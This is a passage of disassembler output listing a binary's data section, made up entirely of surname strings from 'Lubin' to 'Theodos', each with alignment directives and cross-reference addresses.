aLubin db 'Lubin',0 ; DATA XREF: .data:00444DB8�o
align 4
aLucas db 'Lucas',0 ; DATA XREF: .data:00444DBC�o
align 4
aLuciano db 'Luciano',0 ; DATA XREF: .data:00444DC0�o
aLuczkow db 'Luczkow',0 ; DATA XREF: .data:00444DC4�o
aLuecke db 'Luecke',0 ; DATA XREF: .data:00444DC8�o
align 4
aLunetta db 'Lunetta',0 ; DATA XREF: .data:00444DCC�o
aLuoma db 'Luoma',0 ; DATA XREF: .data:00444DD0�o
align 4
aLussier db 'Lussier',0 ; DATA XREF: .data:00444DD4�o
aLutcavage db 'Lutcavage',0 ; DATA XREF: .data:00444DD8�o
align 4
aLuzader db 'Luzader',0 ; DATA XREF: .data:00444DDC�o
aMa db 'Ma',0 ; DATA XREF: .data:00444DE0�o
align 4
aMaccormac db 'Maccormac',0 ; DATA XREF: .data:00444DE4�o
align 10h
aMacdonald db 'Macdonald',0 ; DATA XREF: .data:00444DE8�o
align 4
aMaceachern db 'Maceachern',0 ; DATA XREF: .data:00444DEC�o
align 4
aMacintyre db 'Macintyre',0 ; DATA XREF: .data:00444DF0�o
align 4
aMackenney db 'Mackenney',0 ; DATA XREF: .data:00444DF4�o
align 10h
aMacmillan db 'MacMillan',0 ; DATA XREF: .data:00444DF8�o
align 4
aMacy db 'Macy',0 ; DATA XREF: .data:00444DFC�o
align 4
aMadigan db 'Madigan',0 ; DATA XREF: .data:00444E00�o
aMaggio db 'Maggio',0 ; DATA XREF: .data:00444E04�o
align 4
aMahony db 'Mahony',0 ; DATA XREF: .data:00444E08�o
align 4
aMaier db 'Maier',0 ; DATA XREF: .data:00444E0C�o
align 4
aMaineHershey db 'Maine-Hershey',0 ; DATA XREF: .data:00444E10�o
align 4
aMaisano db 'Maisano',0 ; DATA XREF: .data:00444E14�o
aMalatesta db 'Malatesta',0 ; DATA XREF: .data:00444E18�o
align 4
aMaller db 'Maller',0 ; DATA XREF: .data:00444E1C�o
align 10h
aMalova db 'Malova',0 ; DATA XREF: .data:00444E20�o
align 4
aManalis db 'Manalis',0 ; DATA XREF: .data:00444E24�o
aMandel db 'Mandel',0 ; DATA XREF: .data:00444E28�o
align 4
aManganiello db 'Manganiello',0 ; DATA XREF: .data:00444E2C�o
aMantovan db 'Mantovan',0 ; DATA XREF: .data:00444E30�o
align 10h
aMarch_0 db 'March',0 ; DATA XREF: .data:00444E34�o
align 4
aMarchbanks db 'Marchbanks',0 ; DATA XREF: .data:00444E38�o
align 4
aMarcus db 'Marcus',0 ; DATA XREF: .data:00444E3C�o
align 4
aMargalit db 'Margalit',0 ; DATA XREF: .data:00444E40�o
align 4
aMargetts db 'Margetts',0 ; DATA XREF: .data:00444E44�o
align 4
aMarques db 'Marques',0 ; DATA XREF: .data:00444E48�o
aMartinez db 'Martinez',0 ; DATA XREF: .data:00444E4C�o
align 4
aMartochio db 'Martochio',0 ; DATA XREF: .data:00444E50�o
align 4
aMarton db 'Marton',0 ; DATA XREF: .data:00444E54�o
align 4
aMarubini db 'Marubini',0 ; DATA XREF: .data:00444E58�o
align 4
aMass db 'Mass',0 ; DATA XREF: .data:00444E5C�o
align 10h
aMatalka db 'Matalka',0 ; DATA XREF: .data:00444E60�o
aMatarazzo db 'Matarazzo',0 ; DATA XREF: .data:00444E64�o
align 4
aMatsukata db 'Matsukata',0 ; DATA XREF: .data:00444E68�o
align 10h
aMattson db 'Mattson',0 ; DATA XREF: .data:00444E6C�o
aMauzy db 'Mauzy',0 ; DATA XREF: .data:00444E70�o
align 10h
aMay_0 db 'May',0 ; DATA XREF: .data:00444E74�o
aMazzali db 'Mazzali',0 ; DATA XREF: .data:00444E78�o
aMazziotta db 'Mazziotta',0 ; DATA XREF: .data:00444E7C�o
align 4
aMcbride db 'Mcbride',0 ; DATA XREF: .data:00444E80�o
aMccaffery db 'Mccaffery',0 ; DATA XREF: .data:00444E84�o
align 4
aMccall db 'Mccall',0 ; DATA XREF: .data:00444E88�o
align 4
aMcclearn db 'Mcclearn',0 ; DATA XREF: .data:00444E8C�o
align 10h
aMcdowell db 'Mcdowell',0 ; DATA XREF: .data:00444E90�o
align 4
aMcelroy db 'Mcelroy',0 ; DATA XREF: .data:00444E94�o
aMcfadden db 'McFadden',0 ; DATA XREF: .data:00444E98�o
align 10h
aMcghee db 'Mcghee',0 ; DATA XREF: .data:00444E9C�o
align 4
aMcgoldrick db 'Mcgoldrick',0 ; DATA XREF: .data:00444EA0�o
align 4
aMcilroy db 'McIlroy',0 ; DATA XREF: .data:00444EA4�o
aMcintosh db 'Mcintosh',0 ; DATA XREF: .data:00444EA8�o
align 4
aMckenna db 'Mckenna',0 ; DATA XREF: .data:00444EAC�o
aMclane db 'Mclane',0 ; DATA XREF: .data:00444EB0�o
align 4
aMclaren db 'Mclaren',0 ; DATA XREF: .data:00444EB4�o
aMcnealy db 'Mcnealy',0 ; DATA XREF: .data:00444EB8�o
aMcnulty db 'Mcnulty',0 ; DATA XREF: .data:00444EBC�o
aMeccariello db 'Meccariello',0 ; DATA XREF: .data:00444EC0�o
aMemisoglu db 'Memisoglu',0 ; DATA XREF: .data:00444EC4�o
align 4
aMenzies db 'Menzies',0 ; DATA XREF: .data:00444EC8�o
aMerikoski db 'Merikoski',0 ; DATA XREF: .data:00444ECC�o
align 4
aMerlani db 'Merlani',0 ; DATA XREF: .data:00444ED0�o
aMerminod db 'Merminod',0 ; DATA XREF: .data:00444ED4�o
align 10h
aMerseth db 'Merseth',0 ; DATA XREF: .data:00444ED8�o
aMerz db 'Merz',0 ; DATA XREF: .data:00444EDC�o
align 10h
aMetelka db 'Metelka',0 ; DATA XREF: .data:00444EE0�o
aMetropolis db 'Metropolis',0 ; DATA XREF: .data:00444EE4�o
align 4
aMeurer db 'Meurer',0 ; DATA XREF: .data:00444EE8�o
align 4
aMichelman db 'Michelman',0 ; DATA XREF: .data:00444EEC�o
align 4
aMiddle db 'Middle',0 ; DATA XREF: .data:00444EF0�o
align 10h
aMieher db 'Mieher',0 ; DATA XREF: .data:00444EF4�o
align 4
aMills db 'Mills',0 ; DATA XREF: .data:00444EF8�o
align 10h
aMinh db 'Minh',0 ; DATA XREF: .data:00444EFC�o
align 4
aMini db 'Mini',0 ; DATA XREF: .data:00444F00�o
align 10h
aMinichiello db 'Minichiello',0 ; DATA XREF: .data:00444F04�o
aGonzalez db 'Gonzalez',0 ; DATA XREF: .data:00444F08�o
align 4
aMitropoulos db 'Mitropoulos',0 ; DATA XREF: .data:00444F0C�o
aMittal db 'Mittal',0 ; DATA XREF: .data:00444F10�o
align 4
aMocroft db 'Mocroft',0 ; DATA XREF: .data:00444F14�o
aModestino db 'Modestino',0 ; DATA XREF: .data:00444F18�o
align 10h
aMoeller db 'Moeller',0 ; DATA XREF: .data:00444F1C�o
aMohr db 'Mohr',0 ; DATA XREF: .data:00444F20�o
align 10h
aMoiamedi db 'Moiamedi',0 ; DATA XREF: .data:00444F24�o
align 4
aMonque db 'Monque',0 ; DATA XREF: .data:00444F28�o
align 4
aMontilio db 'Montilio',0 ; DATA XREF: .data:00444F2C�o
align 10h
aMooredech_ db 'MooreDeCh.',0 ; DATA XREF: .data:00444F30�o
align 4
aMorani db 'Morani',0 ; DATA XREF: .data:00444F34�o
align 4
aMoreton db 'Moreton',0 ; DATA XREF: .data:00444F38�o
aMorrison db 'Morrison',0 ; DATA XREF: .data:00444F3C�o
align 4
aMorrow db 'Morrow',0 ; DATA XREF: .data:00444F40�o
align 10h
aMortimer db 'Mortimer',0 ; DATA XREF: .data:00444F44�o
align 4
aMosher db 'Mosher',0 ; DATA XREF: .data:00444F48�o
align 4
aMosler db 'Mosler',0 ; DATA XREF: .data:00444F4C�o
align 4
aMostafavi db 'Mostafavi',0 ; DATA XREF: .data:00444F50�o
align 4
aMotooka db 'Motooka',0 ; DATA XREF: .data:00444F54�o
aMudarri db 'Mudarri',0 ; DATA XREF: .data:00444F58�o
aMuello db 'Muello',0 ; DATA XREF: .data:00444F5C�o
align 10h
aMugnai db 'Mugnai',0 ; DATA XREF: .data:00444F60�o
align 4
aMulkern db 'Mulkern',0 ; DATA XREF: .data:00444F64�o
aMulroy db 'Mulroy',0 ; DATA XREF: .data:00444F68�o
align 4
aMumford db 'Mumford',0 ; DATA XREF: .data:00444F6C�o
aMussachio db 'Mussachio',0 ; DATA XREF: .data:00444F70�o
align 4
aNaddeo db 'Naddeo',0 ; DATA XREF: .data:00444F74�o
align 4
aNapolitano db 'Napolitano',0 ; DATA XREF: .data:00444F78�o
align 10h
aNardi db 'Nardi',0 ; DATA XREF: .data:00444F7C�o
align 4
aNardone db 'Nardone',0 ; DATA XREF: .data:00444F80�o
aNaviaux db 'Naviaux',0 ; DATA XREF: .data:00444F84�o
aNayduch db 'Nayduch',0 ; DATA XREF: .data:00444F88�o
aNelson db 'Nelson',0 ; DATA XREF: .data:00444F8C�o
align 4
aNenna db 'Nenna',0 ; DATA XREF: .data:00444F90�o
align 10h
aNesci db 'Nesci',0 ; DATA XREF: .data:00444F94�o
align 4
aNeuman db 'Neuman',0 ; DATA XREF: .data:00444F98�o
align 10h
aNewfeld db 'Newfeld',0 ; DATA XREF: .data:00444F9C�o
aNewlin db 'Newlin',0 ; DATA XREF: .data:00444FA0�o
align 10h
aNg db 'Ng',0 ; DATA XREF: .data:00444FA4�o
align 4
aNi_0 db 'Ni',0 ; DATA XREF: .data:00444FA8�o
align 4
aNickerson db 'Nickerson',0 ; DATA XREF: .data:00444FAC�o
align 4
aNickoloff db 'Nickoloff',0 ; DATA XREF: .data:00444FB0�o
align 10h
aNisenson db 'Nisenson',0 ; DATA XREF: .data:00444FB4�o
align 4
aNitabach db 'Nitabach',0 ; DATA XREF: .data:00444FB8�o
align 4
aNotman db 'Notman',0 ; DATA XREF: .data:00444FBC�o
align 10h
aNuzum db 'Nuzum',0 ; DATA XREF: .data:00444FC0�o
align 4
aOcougne db 'Ocougne',0 ; DATA XREF: .data:00444FC4�o
aOgata db 'Ogata',0 ; DATA XREF: .data:00444FC8�o
align 4
aOh db 'Oh',0 ; DATA XREF: .data:00444FCC�o
align 4
aOHagan db 'O',27h,'hagan',0 ; DATA XREF: .data:00444FD0�o
aOldford db 'Oldford',0 ; DATA XREF: .data:00444FD4�o
aOlsen db 'Olsen',0 ; DATA XREF: .data:00444FD8�o
align 4
aOlson db 'Olson',0 ; DATA XREF: .data:00444FDC�o
align 4
aOlszewski db 'Olszewski',0 ; DATA XREF: .data:00444FE0�o
align 4
aOMalley db 'O',27h,'malley',0 ; DATA XREF: .data:00444FE4�o
align 4
aOman db 'Oman',0 ; DATA XREF: .data:00444FE8�o
align 4
aOMeara db 'O',27h,'meara',0 ; DATA XREF: .data:00444FEC�o
aOpel db 'Opel',0 ; DATA XREF: .data:00444FF0�o
align 4
aOray db 'Oray',0 ; DATA XREF: .data:00444FF4�o
align 4
aOrfield db 'Orfield',0 ; DATA XREF: .data:00444FF8�o
aOrsi db 'Orsi',0 ; DATA XREF: .data:00444FFC�o
align 4
aOspina db 'Ospina',0 ; DATA XREF: .data:00445000�o
align 4
aOstrowski db 'Ostrowski',0 ; DATA XREF: .data:00445004�o
align 4
aOttaviani db 'Ottaviani',0 ; DATA XREF: .data:00445008�o
align 4
aOtten db 'Otten',0 ; DATA XREF: .data:0044500C�o
align 4
aOuchida db 'Ouchida',0 ; DATA XREF: .data:00445010�o
aOvid db 'Ovid',0 ; DATA XREF: .data:00445014�o
align 4
aPaesdealmeida db 'PaesDealmeida',0 ; DATA XREF: .data:00445018�o
align 4
aPaine db 'Paine',0 ; DATA XREF: .data:0044501C�o
align 4
aPalayoor db 'Palayoor',0 ; DATA XREF: .data:00445020�o
align 10h
aPalepu db 'Palepu',0 ; DATA XREF: .data:00445024�o
align 4
aPallara db 'Pallara',0 ; DATA XREF: .data:00445028�o
aPalmitesta db 'Palmitesta',0 ; DATA XREF: .data:0044502C�o
align 4
aPanadero db 'Panadero',0 ; DATA XREF: .data:00445030�o
align 4
aPanizzon db 'Panizzon',0 ; DATA XREF: .data:00445034�o
align 4
aPantilla db 'Pantilla',0 ; DATA XREF: .data:00445038�o
align 10h
aPaoletti db 'Paoletti',0 ; DATA XREF: .data:0044503C�o
align 4
aParmeggiani db 'Parmeggiani',0 ; DATA XREF: .data:00445040�o
aParris db 'Parris',0 ; DATA XREF: .data:00445044�o
align 10h
aPartridge db 'Partridge',0 ; DATA XREF: .data:00445048�o
align 4
aPascucci db 'Pascucci',0 ; DATA XREF: .data:0044504C�o
align 4
aPatefield db 'Patefield',0 ; DATA XREF: .data:00445050�o
align 4
aPatrick db 'Patrick',0 ; DATA XREF: .data:00445054�o
aPattullo db 'Pattullo',0 ; DATA XREF: .data:00445058�o
align 4
aPavetti db 'Pavetti',0 ; DATA XREF: .data:0044505C�o
aPavlon db 'Pavlon',0 ; DATA XREF: .data:00445060�o
align 4
aPawloski db 'Pawloski',0 ; DATA XREF: .data:00445064�o
align 4
aPaynter db 'Paynter',0 ; DATA XREF: .data:00445068�o
aPeabody db 'Peabody',0 ; DATA XREF: .data:0044506C�o
aPearlberg db 'Pearlberg',0 ; DATA XREF: .data:00445070�o
align 10h
aPederson db 'Pederson',0 ; DATA XREF: .data:00445074�o
align 4
aPeishel db 'Peishel',0 ; DATA XREF: .data:00445078�o
aPenny db 'Penny',0 ; DATA XREF: .data:0044507C�o
align 4
aPereira db 'Pereira',0 ; DATA XREF: .data:00445080�o
aPerko db 'Perko',0 ; DATA XREF: .data:00445084�o
align 4
aPerlak db 'Perlak',0 ; DATA XREF: .data:00445088�o
align 4
aPerlman db 'Perlman',0 ; DATA XREF: .data:0044508C�o
aPerna db 'Perna',0 ; DATA XREF: .data:00445090�o
align 4
aPerone db 'Perone',0 ; DATA XREF: .data:00445094�o
align 4
aPerrimon db 'Perrimon',0 ; DATA XREF: .data:00445098�o
align 4
aPeters db 'Peters',0 ; DATA XREF: .data:0044509C�o
align 10h
aPetruzello db 'Petruzello',0 ; DATA XREF: .data:004450A0�o
align 4
aPettibone db 'Pettibone',0 ; DATA XREF: .data:004450A4�o
align 4
aPettit db 'Pettit',0 ; DATA XREF: .data:004450A8�o
align 10h
aPfister db 'Pfister',0 ; DATA XREF: .data:004450AC�o
aPilbeam db 'Pilbeam',0 ; DATA XREF: .data:004450B0�o
aPinot db 'Pinot',0 ; DATA XREF: .data:004450B4�o
align 4
aPlancon db 'Plancon',0 ; DATA XREF: .data:004450B8�o
aPlant db 'Plant',0 ; DATA XREF: .data:004450BC�o
align 4
aPlasket db 'Plasket',0 ; DATA XREF: .data:004450C0�o
aPlous db 'Plous',0 ; DATA XREF: .data:004450C4�o
align 4
aPo db 'Po',0 ; DATA XREF: .data:004450C8�o
align 4
aPocobene db 'Pocobene',0 ; DATA XREF: .data:004450CC�o
align 4
aPoincaire db 'Poincaire',0 ; DATA XREF: .data:004450D0�o
align 4
aPointer db 'Pointer',0 ; DATA XREF: .data:004450D4�o
aPoirier db 'Poirier',0 ; DATA XREF: .data:004450D8�o
aPolak db 'Polak',0 ; DATA XREF: .data:004450DC�o
align 4
aPolanyi db 'Polanyi',0 ; DATA XREF: .data:004450E0�o
aPolitis db 'Politis',0 ; DATA XREF: .data:004450E4�o
aPoma db 'Poma',0 ; DATA XREF: .data:004450E8�o
align 4
aPoolman db 'Poolman',0 ; DATA XREF: .data:004450EC�o
aPowers db 'Powers',0 ; DATA XREF: .data:004450F0�o
align 4
aPresper db 'Presper',0 ; DATA XREF: .data:004450F4�o
aPreucel db 'Preucel',0 ; DATA XREF: .data:004450F8�o
aPrevost db 'Prevost',0 ; DATA XREF: .data:004450FC�o
aPritchard db 'Pritchard',0 ; DATA XREF: .data:00445100�o
align 4
aPritz db 'Pritz',0 ; DATA XREF: .data:00445104�o
align 10h
aProietti db 'Proietti',0 ; DATA XREF: .data:00445108�o
align 4
aProthrowStith db 'Prothrow-Stith',0 ; DATA XREF: .data:0044510C�o
align 4
aPuccia db 'Puccia',0 ; DATA XREF: .data:00445110�o
align 4
aPugh db 'Pugh',0 ; DATA XREF: .data:00445114�o
align 4
aPynchon db 'Pynchon',0 ; DATA XREF: .data:00445118�o
aQuaday db 'Quaday',0 ; DATA XREF: .data:0044511C�o
align 4
aQuetin db 'Quetin',0 ; DATA XREF: .data:00445120�o
align 4
aRabe db 'Rabe',0 ; DATA XREF: .data:00445124�o
align 4
aRabkin db 'Rabkin',0 ; DATA XREF: .data:00445128�o
align 4
aRadeke db 'Radeke',0 ; DATA XREF: .data:0044512C�o
align 4
aRajagopalan db 'Rajagopalan',0 ; DATA XREF: .data:00445130�o
aRaney db 'Raney',0 ; DATA XREF: .data:00445134�o
align 10h
aRangan db 'Rangan',0 ; DATA XREF: .data:00445138�o
align 4
aRankin db 'Rankin',0 ; DATA XREF: .data:0044513C�o
align 10h
aRapple db 'Rapple',0 ; DATA XREF: .data:00445140�o
align 4
aRayport db 'Rayport',0 ; DATA XREF: .data:00445144�o
aReddenTyler db 'Redden-Tyler',0 ; DATA XREF: .data:00445148�o
align 10h
aReedquist db 'Reedquist',0 ; DATA XREF: .data:0044514C�o
align 4
aCunningham db 'Cunningham',0 ; DATA XREF: .data:00445150�o
align 4
aReinold db 'Reinold',0 ; DATA XREF: .data:00445154�o
aRemak db 'Remak',0 ; DATA XREF: .data:00445158�o
align 4
aRenick db 'Renick',0 ; DATA XREF: .data:0044515C�o
align 10h
aRepetto db 'Repetto',0 ; DATA XREF: .data:00445160�o
aResnik db 'Resnik',0 ; DATA XREF: .data:00445164�o
align 10h
aRhea db 'Rhea',0 ; DATA XREF: .data:00445168�o
align 4
aRichmond db 'Richmond',0 ; DATA XREF: .data:0044516C�o
align 4
aRielly db 'Rielly',0 ; DATA XREF: .data:00445170�o
align 4
aRindos db 'Rindos',0 ; DATA XREF: .data:00445174�o
align 4
aRineer db 'Rineer',0 ; DATA XREF: .data:00445178�o
align 4
aRish db 'Rish',0 ; DATA XREF: .data:0044517C�o
align 4
aRivera db 'Rivera',0 ; DATA XREF: .data:00445180�o
align 4
aRobinson db 'Robinson',0 ; DATA XREF: .data:00445184�o
align 4
aRocha db 'Rocha',0 ; DATA XREF: .data:00445188�o
align 10h
aRoesler db 'Roesler',0 ; DATA XREF: .data:0044518C�o
aRogers db 'Rogers',0 ; DATA XREF: .data:00445190�o
align 10h
aRonen db 'Ronen',0 ; DATA XREF: .data:00445194�o
align 4
aRow db 'Row',0 ; DATA XREF: .data:00445198�o
aRoyal db 'Royal',0 ; DATA XREF: .data:0044519C�o
align 4
aRu db 'Ru',0 ; DATA XREF: .data:004451A0�o
align 4
aRuan db 'Ruan',0 ; DATA XREF: .data:004451A4�o
align 10h
aRuderman db 'Ruderman',0 ; DATA XREF: .data:004451A8�o
align 4
aRuescher db 'Ruescher',0 ; DATA XREF: .data:004451AC�o
align 4
aRush db 'Rush',0 ; DATA XREF: .data:004451B0�o
align 10h
aRyu db 'Ryu',0 ; DATA XREF: .data:004451B4�o
aSabatello db 'Sabatello',0 ; DATA XREF: .data:004451B8�o
align 10h
aSadler db 'Sadler',0 ; DATA XREF: .data:004451BC�o
align 4
aSafire db 'Safire',0 ; DATA XREF: .data:004451C0�o
align 10h
aSahu db 'Sahu',0 ; DATA XREF: .data:004451C4�o
align 4
aSali db 'Sali',0 ; DATA XREF: .data:004451C8�o
align 10h
aSamson db 'Samson',0 ; DATA XREF: .data:004451CC�o
align 4
aSanchezRamirez db 'Sanchez-Ramirez',0 ; DATA XREF: .data:004451D0�o
aSanna db 'Sanna',0 ; DATA XREF: .data:004451D4�o
align 10h
aSapers db 'Sapers',0 ; DATA XREF: .data:004451D8�o
align 4
aSarin db 'Sarin',0 ; DATA XREF: .data:004451DC�o
align 10h
aSartore db 'Sartore',0 ; DATA XREF: .data:004451E0�o
aSase db 'Sase',0 ; DATA XREF: .data:004451E4�o
align 10h
aSatin db 'Satin',0 ; DATA XREF: .data:004451E8�o
align 4
aSatta db 'Satta',0 ; DATA XREF: .data:004451EC�o
align 10h
aSatterthwaite db 'Satterthwaite',0 ; DATA XREF: .data:004451F0�o
align 10h
aSawtell db 'Sawtell',0 ; DATA XREF: .data:004451F4�o
aSayied db 'Sayied',0 ; DATA XREF: .data:004451F8�o
align 10h
aScarponi db 'Scarponi',0 ; DATA XREF: .data:004451FC�o
align 4
aScepan db 'Scepan',0 ; DATA XREF: .data:00445200�o
align 4
aScharf db 'Scharf',0 ; DATA XREF: .data:00445204�o
align 4
aScharlemann db 'Scharlemann',0 ; DATA XREF: .data:00445208�o
aScheiner db 'Scheiner',0 ; DATA XREF: .data:0044520C�o
align 4
aSchiano db 'Schiano',0 ; DATA XREF: .data:00445210�o
aSchifini db 'Schifini',0 ; DATA XREF: .data:00445214�o
align 4
aSchilling db 'Schilling',0 ; DATA XREF: .data:00445218�o
align 4
aSchmitt db 'Schmitt',0 ; DATA XREF: .data:0044521C�o
aSchossberger db 'Schossberger',0 ; DATA XREF: .data:00445220�o
align 4
aSchuman db 'Schuman',0 ; DATA XREF: .data:00445224�o
aSchutte db 'Schutte',0 ; DATA XREF: .data:00445228�o
aSchuyler db 'Schuyler',0 ; DATA XREF: .data:0044522C�o
align 4
aSchwan db 'Schwan',0 ; DATA XREF: .data:00445230�o
align 10h
aSchwickrath db 'Schwickrath',0 ; DATA XREF: .data:00445234�o
aScovel db 'Scovel',0 ; DATA XREF: .data:00445238�o
align 4
aScudder db 'Scudder',0 ; DATA XREF: .data:0044523C�o
aSeaton db 'Seaton',0 ; DATA XREF: .data:00445240�o
align 4
aSeeber db 'Seeber',0 ; DATA XREF: .data:00445244�o
align 4
aSegal db 'Segal',0 ; DATA XREF: .data:00445248�o
align 4
aSekler db 'Sekler',0 ; DATA XREF: .data:0044524C�o
align 4
aSelvage db 'Selvage',0 ; DATA XREF: .data:00445250�o
aSen db 'Sen',0 ; DATA XREF: .data:00445254�o
aSennett db 'Sennett',0 ; DATA XREF: .data:00445258�o
aSeterdahl db 'Seterdahl',0 ; DATA XREF: .data:0044525C�o
align 4
aSexton db 'Sexton',0 ; DATA XREF: .data:00445260�o
align 4
aSeyfert db 'Seyfert',0 ; DATA XREF: .data:00445264�o
aShaikh db 'Shaikh',0 ; DATA XREF: .data:00445268�o
align 4
aShakis db 'Shakis',0 ; DATA XREF: .data:0044526C�o
align 4
aShankland db 'Shankland',0 ; DATA XREF: .data:00445270�o
align 4
aShanley db 'Shanley',0 ; DATA XREF: .data:00445274�o
aShar db 'Shar',0 ; DATA XREF: .data:00445278�o
align 4
aShatrov db 'Shatrov',0 ; DATA XREF: .data:0044527C�o
aShavelson db 'Shavelson',0 ; DATA XREF: .data:00445280�o
align 4
aShea db 'Shea',0 ; DATA XREF: .data:00445284�o
align 4
aSheats db 'Sheats',0 ; DATA XREF: .data:00445288�o
align 4
aShepherd db 'Shepherd',0 ; DATA XREF: .data:0044528C�o
align 4
aSheppard db 'Sheppard',0 ; DATA XREF: .data:00445290�o
align 4
aShepstone db 'Shepstone',0 ; DATA XREF: .data:00445294�o
align 10h
aShesko db 'Shesko',0 ; DATA XREF: .data:00445298�o
align 4
aShia db 'Shia',0 ; DATA XREF: .data:0044529C�o
align 10h
aShibata db 'Shibata',0 ; DATA XREF: .data:004452A0�o
aShimon db 'Shimon',0 ; DATA XREF: .data:004452A4�o
align 10h
aSiesto db 'Siesto',0 ; DATA XREF: .data:004452A8�o
align 4
aSigalot db 'Sigalot',0 ; DATA XREF: .data:004452AC�o
aSigini db 'Sigini',0 ; DATA XREF: .data:004452B0�o
align 4
aSigna db 'Signa',0 ; DATA XREF: .data:004452B4�o
align 10h
aSilverman db 'Silverman',0 ; DATA XREF: .data:004452B8�o
align 4
aSilvetti db 'Silvetti',0 ; DATA XREF: .data:004452BC�o
align 4
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: .data:004452C0�o
align 4
aSirilli db 'Sirilli',0 ; DATA XREF: .data:004452C4�o
aSites db 'Sites',0 ; DATA XREF: .data:004452C8�o
align 4
aSkane db 'Skane',0 ; DATA XREF: .data:004452CC�o
align 4
aSkerry db 'Skerry',0 ; DATA XREF: .data:004452D0�o
align 4
aSkoda db 'Skoda',0 ; DATA XREF: .data:004452D4�o
align 4
aSloan db 'Sloan',0 ; DATA XREF: .data:004452D8�o
align 4
aSlowe db 'Slowe',0 ; DATA XREF: .data:004452DC�o
align 4
aSmilow db 'Smilow',0 ; DATA XREF: .data:004452E0�o
align 4
aSniffen db 'Sniffen',0 ; DATA XREF: .data:004452E4�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: .data:004452E8�o
align 4
aSocolow db 'Socolow',0 ; DATA XREF: .data:004452EC�o
aSolon db 'Solon',0 ; DATA XREF: .data:004452F0�o
align 4
aSomers db 'Somers',0 ; DATA XREF: .data:004452F4�o
align 10h
aSommariva db 'Sommariva',0 ; DATA XREF: .data:004452F8�o
align 4
aSorabella db 'Sorabella',0 ; DATA XREF: .data:004452FC�o
align 4
aSorg db 'Sorg',0 ; DATA XREF: .data:00445300�o
align 10h
aSottak db 'Sottak',0 ; DATA XREF: .data:00445304�o
align 4
aSoukup db 'Soukup',0 ; DATA XREF: .data:00445308�o
align 10h
aSoule db 'Soule',0 ; DATA XREF: .data:0044530C�o
align 4
aSoultanian db 'Soultanian',0 ; DATA XREF: .data:00445310�o
align 4
aSpanier db 'Spanier',0 ; DATA XREF: .data:00445314�o
aSparrow db 'Sparrow',0 ; DATA XREF: .data:00445318�o
aSpaulding db 'Spaulding',0 ; DATA XREF: .data:0044531C�o
align 10h
aSpeizer db 'Speizer',0 ; DATA XREF: .data:00445320�o
aSpence db 'Spence',0 ; DATA XREF: .data:00445324�o
align 10h
aSperber db 'Sperber',0 ; DATA XREF: .data:00445328�o
aSpicer db 'Spicer',0 ; DATA XREF: .data:0044532C�o
align 10h
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: .data:00445330�o
align 10h
aSpiliotis db 'Spiliotis',0 ; DATA XREF: .data:00445334�o
align 4
aSpinrad db 'Spinrad',0 ; DATA XREF: .data:00445338�o
aStmartin db 'StMartin',0 ; DATA XREF: .data:0044533C�o
align 10h
aStalvey db 'Stalvey',0 ; DATA XREF: .data:00445340�o
aStam db 'Stam',0 ; DATA XREF: .data:off_445344�o
align 10h
aStang db 'Stang',0 ; DATA XREF: .data:00445348�o
align 4
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: .data:0044534C�o
align 4
aStates db 'States',0 ; DATA XREF: .data:00445350�o
align 10h
aStatlender db 'Statlender',0 ; DATA XREF: .data:00445354�o
align 4
aStefani db 'Stefani',0 ; DATA XREF: .data:00445358�o
aSteiner db 'Steiner',0 ; DATA XREF: .data:0044535C�o
aStephanian db 'Stephanian',0 ; DATA XREF: .data:00445360�o
align 4
aStepniewska db 'Stepniewska',0 ; DATA XREF: .data:00445364�o
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: .data:00445368�o
align 4
aStiepock db 'Stiepock',0 ; DATA XREF: .data:0044536C�o
align 10h
aStillwell db 'Stillwell',0 ; DATA XREF: .data:00445370�o
align 4
aStock db 'Stock',0 ; DATA XREF: .data:00445374�o
align 4
aStockton db 'Stockton',0 ; DATA XREF: .data:00445378�o
align 10h
aStockwell db 'Stockwell',0 ; DATA XREF: .data:0044537C�o
align 4
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: .data:00445380�o
aStonich db 'Stonich',0 ; DATA XREF: .data:00445384�o
aStorer db 'Storer',0 ; DATA XREF: .data:00445388�o
align 4
aStott db 'Stott',0 ; DATA XREF: .data:0044538C�o
align 10h
aStrange db 'Strange',0 ; DATA XREF: .data:00445390�o
aStrauch db 'Strauch',0 ; DATA XREF: .data:00445394�o
aStreiff db 'Streiff',0 ; DATA XREF: .data:00445398�o
aStringer db 'Stringer',0 ; DATA XREF: .data:0044539C�o
align 4
aSullivan db 'Sullivan',0 ; DATA XREF: .data:004453A0�o
align 10h
aSumner db 'Sumner',0 ; DATA XREF: .data:004453A4�o
align 4
aSuo db 'Suo',0 ; DATA XREF: .data:004453A8�o
aSurdam db 'Surdam',0 ; DATA XREF: .data:004453AC�o
align 4
aSweeting db 'Sweeting',0 ; DATA XREF: .data:004453B0�o
align 10h
aSweetser db 'Sweetser',0 ; DATA XREF: .data:004453B4�o
align 4
aSwindle db 'Swindle',0 ; DATA XREF: .data:004453B8�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: .data:004453BC�o
aTai db 'Tai',0 ; DATA XREF: .data:004453C0�o
aTalaugon db 'Talaugon',0 ; DATA XREF: .data:004453C4�o
align 4
aTambiah db 'Tambiah',0 ; DATA XREF: .data:004453C8�o
aTandler db 'Tandler',0 ; DATA XREF: .data:004453CC�o
aTanowitz db 'Tanowitz',0 ; DATA XREF: .data:004453D0�o
align 4
aTatar db 'Tatar',0 ; DATA XREF: .data:004453D4�o
align 10h
aTaveras db 'Taveras',0 ; DATA XREF: .data:004453D8�o
aTawn db 'Tawn',0 ; DATA XREF: .data:004453DC�o
align 10h
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: .data:004453E0�o
align 4
aTeague db 'Teague',0 ; DATA XREF: .data:004453E4�o
align 4
aTemes db 'Temes',0 ; DATA XREF: .data:004453E8�o
align 4
aTemmer db 'Temmer',0 ; DATA XREF: .data:004453EC�o
align 4
aTenney db 'Tenney',0 ; DATA XREF: .data:004453F0�o
align 4
aTerracini db 'Terracini',0 ; DATA XREF: .data:004453F4�o
align 4
aThan db 'Than',0 ; DATA XREF: .data:004453F8�o
align 10h
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: .data:004453FC�o
align 10h
aTheodos db 'Theodos',0 ; DATA XREF: .data:00445400�o
